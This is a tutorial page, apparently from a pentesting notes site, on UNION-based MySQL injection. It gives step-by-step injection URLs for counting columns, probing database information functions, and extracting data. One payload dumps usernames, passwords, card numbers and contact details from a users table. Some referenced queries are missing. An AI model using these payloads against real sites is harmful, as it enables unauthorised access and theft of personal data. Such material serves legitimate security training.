search

💉UNION Based MySQL Injection

hashtag
Step : 1

hashtag
We need to find the Number of Columns in the site, we will use a use 'Order By' Method

hashtag
'Order By' as we know if we give order by a number more than the number under the query, then it will throw an error. So we can easily understand that we can use order by to know how many columns we have inside the query

URL Injection
Output

http://fakesite.com/report.php?id=23 order by 10--+

Error (then reduce)

http://fakesite.com/report.php?id=23 order by 1--+

Working (then increse)

hashtag
----------------------------------------------------------------

hashtag
Step : 2

hashtag
Now we will use Union select statement over here.

Sposed number of columns "5"

http://fakesite.com/report.php?id=23 union select 1,2,3,4,5--+

what will it do is concatenate one more row to the output which will look like this

column1
column2
column3
column4
column5

anydata

anydata

anydata

anydata

anydata

1

2

3

4

5

hashtag
----------------------------------------------------------------

hashtag
If you see any of these numbers printed in the webpage or the title or anywhere else then you can know the the developer is printing multiple rows. But in case you can not see any of these numbers printed then you can simply invalidate the first query so that it wont give any output and eventually your output will become the one and only output to be printed.

hashtag
Above i have specified some ways to make a query invalid but remember that & should be url encoded before usage. Now when we will use any of the above query, one row will come in output.

column1
column2
column3
column4
column5

1

2

3

4

5

hashtag
Any of the number must be printed in the webpage again as basic thing to understand is that programmer may be only printing some particular columns from the output, lets say the third one. So we if we can see 3 in the page then its good.

hashtag
Otherwise we can try the query below with some other values:

hashtag
Now just try to find it inside the source code. If you find hello1 that means the first colums is getting printed and if you found hello2 then the second column is getting printed and so on. Still some times if the programmer is using mysql_real_escape_string it may create an error or else no output.

hashtag
We can simply avoid the usage of single quotes using hex values. Below is the encoded query for the above same query:

hashtag
One small thing to remember is that always add 0x before any hexadecimal value. Hopefully the above query should work and you will find the column which is getting printed on the webpage or inside the source code.

hashtag
----------------------------------------------------------------

hashtag
Step : 3

hashtag
Lets Asume with 3rd column for this example. As we know that any thing on place of third column is getting printed.

hashtag
Then now we can try some Default functions and variables, to get some information related to our target.

hashtag
Below are some of the Variables/Functions that can be used to get information about your target machine.

Variable/Function
Output

@@hostname

Current Hostname

@@tmpdir

Tept Directory

@@datadir

Data Directory

@@version

Version of DB

@@basedir

Base Directory

user()

Current User

database()

Current Database

version()

Version

schema()

current Database

UUID()

System UUID key

current_user()

Current User

current_user

Current User

system_user()

Current Sustem user

session_user()

Session user

@@GLOBAL.have_symlink

Check if Symlink Enabled or Disabled

@@GLOBAL.have_ssl

Check if it have ssl or not

hashtag
As we know that third is the column which is getting printed so now we will use the above functions on place of that columns only.

Now we will move to our next part, which is Data Extraction.

hashtag
----------------------------------------------------------------

hashtag
Step : 3

hashtag
Table Extraction using SQLi

There are many ways to extract data using SQLi so first one is union based. First i will show you the Queries and then show you how we can inject them.

Will give us names of all the Databases avaiable. But as we found earlier that sometimes programmer may not be printing all the rows. He may be printing the first row from output. So in that case we can use limit keyword to enumerate the rows one by one.

In the above manner we can get each row one by one. Now lets see how can we extract all the table names from a database.

Above injection will give you all the rows at once, but if you want one by one then you can use limit.

hashtag
----------------------------------------------------------------

hashtag
Step : 4

hashtag
Columns Extraction using SQLi

hashtag
After getting the Table Names we can move on and start collecting the names of Columns under any table. we can specify the table name as we have all the tablenames.

If the above query do not give any output or an error. You can try to hex the tablename. And now we can try to get all the table names one by one if only one row is getting printed.

hashtag
----------------------------------------------------------------

hashtag
Step : 5

hashtag
Now we know the database name, the table names and the column names so the last stage starts of extracting data from the columns.

hashtag
Now we have to specify from which column we want the data and from which table.

hashtag
Query and injection is simple at this stage

hashtag
----------------------------------------------------------------

hashtag
Step : 4

hashtag
To get the Multiple Data from a specific column , the following query should be typed:

?id=1' UNION SELECT 1,2,3,4,5,6,group_concat(uname,'-',pass,'-',cc,'-',address,'-',email,'-',name,'-',phone,'-',cart),8,9,10,11 from users-- -

hashtag
To get Single Data from a specific column , the following query should be typed.

?id=1' UNION SELECT 1,2,3,4,5,6,email,8,9,10,11 from users-- -

Find the password for the administrator user, and use it to log in.

hashtag
-------------------------------------------------------------

PreviousFinding the SQL injectionNextUnion Based MSSQL Injection

Last updated